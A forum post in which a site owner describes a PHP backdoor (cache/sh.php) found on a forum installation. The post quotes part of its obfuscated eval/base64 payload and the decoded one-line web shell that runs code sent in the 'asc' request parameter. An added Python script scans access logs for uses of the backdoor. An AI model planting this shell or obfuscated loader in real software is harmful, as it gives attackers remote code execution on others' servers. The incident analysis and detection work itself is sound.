Possible virus/malware/access script?

So, all of a sudden, Google started doing its little "This site isn't safe" page for one of my domains.

Curious, I ran ClamAV, and then ran IPB's internal scanner. IPB came up with this file titled sh.php.

I went to FTP to see what the contents of this file were. Its location was cache/sh.php, so I didn't think it was a legit file. Plus IPB listed it at 8.

I would post the contents of said file, but I don't know if that would be the best method...

You can find it on Google if you really wanted to, but it starts out as:

=========================        END       ===================================
========================= /index.php?<?/*gHrE={M*/eval/*t%)t*/(/*_f0srO*/base64_decode/*x31sm*/(/*Y%>*/'Lyo/WFdNR2Z5byovZXZhbC8qTEBXfjUqLygvKidoSCovYmFzZTY0X2RlY29kZS8qNXJcYzAqLygvKjo+ZEMqLydMeW83VmtwQlN6NHFMMmxtTHlwN2IxNHFMeWd2S24nLyp0XVJKOiovLi8qYVw+Ml1rKi8nUTlPSHRtTlM0cUwybHpjMlYwTHlwQWV6WlJMU292Jy8qPn5NLSovLi8qLmBrVGdVTCovJ0tDOHFPVEJlTkU4cUx5UmZVa1ZSVlVWVFZDOHFXRycvKik6WiovLi8qOURGREl5cyovJ29sZmpZcUwxc3ZLa1JsYkNvdkoyRW5MeW9vTVNseCcvKkZiTkBXSSovLi8qYkR2SzYqLydWQ292TGk4cWZGVXdYQ292SjNOakp5OHFKazAzTWknLypmKTR7cSovLi8qfU9KV1hmKi8nb3ZYUzhxZWpaeUlGd3FMeThxVW1rM1dYQXFMeWt2Jy8qIHtTKzs8PiovLi8qbWU/UyovJ0tuSmRQelZOS2k4d1JsYkNvdkoyRW5MeW9vTVNseCcvKkZiTkBXSSovLi8qYkR2SzYqLydWQ29...

Any ideas how it was inserted, if there is a known patch for it, or is there really no need for concern here?

EDIT: Just decoded it on a local machine. It comes out to be:

if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));

Which, again, can be used to run code just from the url. (index.php?asc=bad code)

Isn't there a way to see which queries have been run from which IP?

And I still want an answer to how it got put there in the first place.
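On the "which queries from which IP" question: the web server's access log is the place to look. The script below is an added example (not from the post or from IPB) that reads Apache/nginx combined-format log lines and flags the two traces the decoded backdoor leaves: a hit on the dropped file cache/sh.php, or any request carrying the `asc` parameter that the eval() executes, grouped by source IP. The log lines in it are constructed sample data; only the file path and the parameter name come from the thread.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" format: ip ident user [ts] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

SUSPECT_PATHS = ("/cache/sh.php",)  # file reported by the IPB scanner
SUSPECT_PARAMS = {"asc"}            # parameter name from the decoded payload


def classify(line):
    """Return a reason string if the request looks like backdoor use, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path.endswith(SUSPECT_PATHS):
        return f"request to dropped file {parts.path}"
    # Only GET-style query strings are logged; an 'asc' sent in a POST body
    # or a cookie is invisible here, which is why the path check above matters.
    hit = set(parse_qs(parts.query, keep_blank_values=True)) & SUSPECT_PARAMS
    if hit:
        return f"eval'd parameter {','.join(sorted(hit))} on {parts.path}"
    return None


def suspicious_by_ip(lines):
    """Map source IP -> list of (timestamp, reason) for every flagged request."""
    out = defaultdict(list)
    for line in lines:
        reason = classify(line)
        if reason:
            m = LOG_RE.match(line)
            out[m.group("ip")].append((m.group("ts"), reason))
    return dict(out)


# Constructed sample log; IPs and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2011:13:01:02 +0000] "GET /index.php?showtopic=12 HTTP/1.1" 200 8123
198.51.100.7 - - [10/Mar/2011:13:02:10 +0000] "POST /cache/sh.php HTTP/1.1" 200 42
198.51.100.7 - - [10/Mar/2011:13:02:44 +0000] "GET /index.php?asc=echo+1%3B HTTP/1.1" 200 57
203.0.113.5 - - [10/Mar/2011:13:03:00 +0000] "GET /index.php?act=Login HTTP/1.1" 200 4410
""".splitlines()

if __name__ == "__main__":
    for ip, hits in suspicious_by_ip(SAMPLE_LOG).items():
        for ts, reason in hits:
            print(ip, ts, reason)
```

Because `$_REQUEST` also reads POST bodies and cookies, the flagged IPs are a lower bound; the earliest hit on cache/sh.php itself is the better anchor for working backwards to how the file was written.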
